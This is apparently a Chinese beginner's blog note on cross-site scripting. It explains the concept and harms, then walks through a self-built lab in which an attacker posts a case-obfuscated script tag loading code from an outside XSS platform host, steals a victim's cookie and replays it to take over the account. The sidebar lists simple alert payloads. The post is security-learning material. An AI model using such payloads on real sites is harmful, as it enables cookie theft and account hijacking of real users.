XSS漏洞 初学习

最新推荐文章于 2024-07-16 20:46:50 发布
最新推荐文章于 2024-07-16 20:46:50 发布
阅读量70 收藏
点赞数
分类专栏: 安全学习笔记 文章标签: xss 学习 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wion03/article/details/131681496
版权

一、概念

Cross Site Scripting(XSS),跨站脚本攻击。

XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

二、原理

攻击者提供一段恶意的javascript代码,通过各种方式在受害者浏览器(暂定)上执行。

三、危害

  1. 窃取coockie
  2. 制造网站蠕虫
  3. 钓鱼

四、练习思路步骤(自创建靶场测试)

1.受害者注册账号

 

2.攻击者注册xss平台账号,创建项目,获取恶意代码

 

恶意代码:

<sCRiPt sRC=//xss.yt/mLSq></sCrIpT>

 

3.攻击者发布一个带有攻击代码的帖子(引诱受害者点击)

 

4.受害者因好奇等原因打开该帖子,中招

 (PS:太可恶啦!!)

5.攻击者收获cookie,以受害者身份活动

使用火狐浏览器的modheader插件将Cookie添加到请求信息中

 

攻击者再进入该网站,就自动登录进被攻击者账号

 

wion03
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网安学习日志 XSS靶机训练(xss-labs-master)(1-10)
qq_41819426的博客
01-19 5089
1.第一关 页面中我们并没有看到输入框,但是我们看到url中可以进行name值的修改。 看起来应该没有任何的过滤,我们直接输入语句尝试: <script>alert(1)</script> 这里还可以用很多方法,以下列举一些常用的方法: <input type=“text” onmouseover=alert(1)> <a href="javascript:alert(1)">a</a> <a onmouseover=“javasc
asp漏洞打包
04-04
描述中的"网上能找到的asp的漏洞都在这里了"暗示这个压缩包可能包含了各种ASP漏洞的综合资源,包括但不限于SQL注入、命令注入、跨站脚本(XSS)、文件包含漏洞等。这些漏洞都可能被恶意黑客用来入侵服务器,获取敏感...
推荐好用的XSS漏洞扫描利用工具
heike_Ch的博客
04-24 945
toxssin 是一种开源渗透测试工具,可自动执行跨站脚本 (XSS) 漏洞利用过程。它由一个 https 服务器组成,它充当为该工具 (toxin.js) 提供动力的恶意 JavaScript 有效负载生成的流量的解释器。
一个简单的Web劫持(XSS漏洞
yxngu
03-19 920
本篇文章仅供参考学习,切勿用作非法用途
Swagger-UI 反射型 XSS
2401_84466325的博客
06-16 790
是 Swagger UI 的入口页面,是一个用于与API进行交互和可视化的工具。Swagger UI 是一个开源项目,提供了一个直观的用户界面来查看API文档,并允许用户直接从文档中发送请求,查看响应,从而测试和调试API,可以通过看到有关更多的XSS漏洞
web安全 漏洞体验
m0_46377671的博客
10-29 618
**感受:**这两天,老师拿了授权的网站给我们这些新手试试手,让让我们找找漏洞。自己用的sql xss 上传比较多,也只熟悉这些,试了很多次,人就憨了,网站一检测到你的入侵行为,就报“waf检测到恶意注入”,“你存在hack行为,已禁你ip,若误封请与管理员联系”,“你的hack行为,以保存你的特征码”等等不友好信息,人就呆了,有点不知所措,有时有些网站做的很差,接口没写完,功能没实现,用户体验极差,感觉网站就只做了一半就跑,有点不好吧。回到检测漏洞,我感觉我所知道的检测方法太贫穷了,我就晚上又学了点kal
SSTI漏洞手入门
kracer的博客
01-08 956
0x01 什么是SSTI SSTI,即服务器端模板注入(Server-Side Template Injection)。攻击者在服务器输入语句,服务端将其作为Web应用模板内容的一部分,在进行目标编译渲染的过程中,进行了语句的拼接,执行了所插入的恶意内容,从而导致信息泄露、代码执行、GetShell等问题。 补充: 1)模板引擎是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的文档,就是将模板文件和数据通过...
web安全学习笔记(四)——XSS学习思维导图
jokerhappy的博客
06-15 603
前行不易,勿忘心。
Web安全 | XSS跨站脚本攻击漏洞
白帽黑客佳哥的博客
05-24 832
XSS又叫CSS(Cross Site Script)跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS漏洞通常是通过PHP的输出函数将Javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。常见的输出函数有:读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
PHP的XSS脚本漏洞
weixin_30847865的博客
04-22 154
今天开始看书上网学习PHP了!希望能得到大家的鼓励!谢谢 今天偶然看到PHP5的一个XSS漏洞,在此小结一下。顺便提醒,使用PHP5的朋友最好打下补丁,或者升级一下。   如果你不懂什么是XSS,可以看这里,或者这里(中文的也许会好懂一些)。   国内不少论坛(包括一些投资,金融、移民等论坛)都存在跨站脚本漏洞,例如这里 有一个Google Hack+XSS的...
[ SRC ] SRC技术文档汇总(全是干货--理论+实战).rar
02-11
这些文档可能会涵盖如SQL注入、跨站脚本(XSS)、命令注入、缓冲区溢出等经典漏洞的原理,以及如何通过源代码分析来预防它们。此外,文档可能还会涉及软件开发生命周期(SDLC)中的安全实践,如静态代码分析和动态分析...
pikachu(新手web安全入门靶场).7z
08-29
XSS漏洞允许攻击者在目标网站上注入可执行的脚本,通常是JavaScript。这可能导致窃取用户cookie、执行钓鱼攻击或者在用户浏览器上运行其他恶意代码。Pikachu靶场的XSS挑战将教导学者如何识别和利用这类漏洞。 五...
Web安全深度剖析(张柄帅)
07-25
第7章 XSS跨站脚本漏洞 129 7.1 XSS原理解析 129 7.2 XSS类型 130 7.2.1 反射型XSS 130 7.2.2 存储型XSS 131 7.2.3 DOM XSS 132 7.3 检测XSS 133 7.3.1 手工检测XSS 134 7.3.2 全自动检测XSS 134 7.4 XSS高级利用 ...
网络安全靶场(dvwa).7z
01-29
无论你是涉信息安全的新手还是经验丰富的安全专家,都可以在这个靶场中找到适合自己的学习路径,提升自身的安全技能。在学习过程中,一定要遵守相关法律法规,不得用于非法目的,确保网络安全知识的正确运用。
XSS: 原理 反射型实例[入门]
h1008685的博客
07-12 784
xss原理,结合实例讲解
DOM型XSS(跨站脚本攻击)的自动化测试和人工测试方法
m0_52484587的博客
07-16 145
它包含预定义的XSS payload集合,并采用多线程处理以提高效率,能够检测反射型、存储型以及DOM型XSS漏洞,并生成详细的报告。:使用如腾讯安全平台部提出的门神DOM-XSS防御JS等方案,通过JavaScript代码实现客户端防护,提高常见DOM XSS攻击的门槛。:通过浏览器的开发者工具,如F12,检查页面的DOM结构,尝试修改DOM元素的属性或内容,观察是否触发XSS。:分析Web页面的JavaScript代码,特别是那些动态生成HTML的部分,以查找可能的XSS漏洞
xss复习总结及ctfshow做题总结xss
m0_74402888的博客
07-15 539
客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。存储型XSS:<持久化> 代码是存储在服务器数据库中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie(虽然还有种DOM型XSS,但是也还是包括在存储型XSS内)。
XSS
最新发布
qq_58553228的博客
07-16 371
反射型 / 非持久型XSS定义:用户输入 “反射” 给 浏览器;示例:攻击方式:注入、诱导点击脚本为协议:<a href=’’javascript:alert(1)>编码输入: `<img src=1 οnerrοr=alalert(1)>`存储型 / 持久性XSS定义:将含有script的文本/文件/数据等的 用户输入,存储到server。攻击方式:存储内容的地方如博客,文件上传的地方。DOM型定义:修改页面的DOM节点形成。从效属于反射型XSS。示例:将。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值